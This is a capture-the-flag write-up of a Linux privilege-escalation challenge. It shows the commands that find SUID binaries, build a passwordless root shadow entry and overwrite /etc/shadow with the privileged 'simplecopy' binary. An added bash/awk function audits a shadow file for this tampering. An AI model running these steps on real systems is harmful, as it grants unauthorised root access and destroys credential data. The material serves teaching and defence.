Linux PrivEsc

Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

Rose Mold

What am I doing in this saloon? The better question is: what planet are you from?
Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.


Linux Privilege Escalation Techniques

There are various ways to escalate privileges on a Linux system.

Linux Command Injection

Using the privileged binary to overwrite a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument.


Upon obtaining console access to the terminal, we started looking for interesting files on the filesystem, beginning with a search for SUID binaries:

find / -perm -u+s 2>/dev/null

We found the binary /usr/bin/simplecopy. Because it runs with root permissions, it can copy any file on the system, so the plan was to use it to take over root.

Next we checked the structure of the /etc/shadow file and created a simple file, sh2, containing a root account entry with no password.

echo -e "root::19634:0:99999:7:::" > sh2

Then, using the simplecopy binary, we overwrote the /etc/shadow file. From that point on "su" no longer required a password, so we could freely use the root account.

 simplecopy sh2 /etc/shadow


Terminal output
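From the defender's side, the overwrite above leaves a recognisable state: a shadow file cut down to one entry whose password field is empty. The following check for that state is an added example, not part of the original write-up; the function name audit_shadow, the finding labels and the default floor of 5 entries are assumptions, and the sample line in demo is the one from the echo command above.

```shell
#!/usr/bin/env bash
# audit_shadow FILE [MIN_ENTRIES]
# Flags the state left behind when a shadow file is overwritten with a
# passwordless root entry. Prints one finding per line; returns 1 if any.
# MIN_ENTRIES (default 5) is an assumed floor for a normal system.
audit_shadow() {
    local file="$1" min_entries="${2:-5}"
    awk -F: -v min="$min_entries" '
        $0 == "" { next }                        # skip blank lines
        NF != 9 {                                # shadow(5) entries have 9 fields
            printf "MALFORMED line %d: %d fields, expected 9\n", NR, NF
            bad++; next
        }
        { entries++ }
        $1 == "root" { seen_root = 1 }
        $2 == "" {                               # empty field 2: no password needed
            printf "EMPTY_PASSWORD %s\n", $1
            bad++
        }
        END {
            if (!seen_root) { print "NO_ROOT_ENTRY"; bad++ }
            if (entries < min) {                 # whole file replaced by a short one
                printf "TRUNCATED %d entries, expected at least %d\n", entries, min
                bad++
            }
            exit (bad > 0)
        }
    ' "$file"
}

# Constructed sample: the single line from the write-up, audited in a temp file.
demo() {
    local tmp rc=0
    tmp=$(mktemp)
    printf '%s\n' 'root::19634:0:99999:7:::' > "$tmp"
    audit_shadow "$tmp" || rc=$?
    rm -f "$tmp"
    return "$rc"
}
```

On a live host the function would be pointed at /etc/shadow as root, alongside a review of the `find / -perm -u+s` output for SUID binaries that are not part of the distribution.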




Rose Mold

Yup, I knew you knew. You just have that vibe.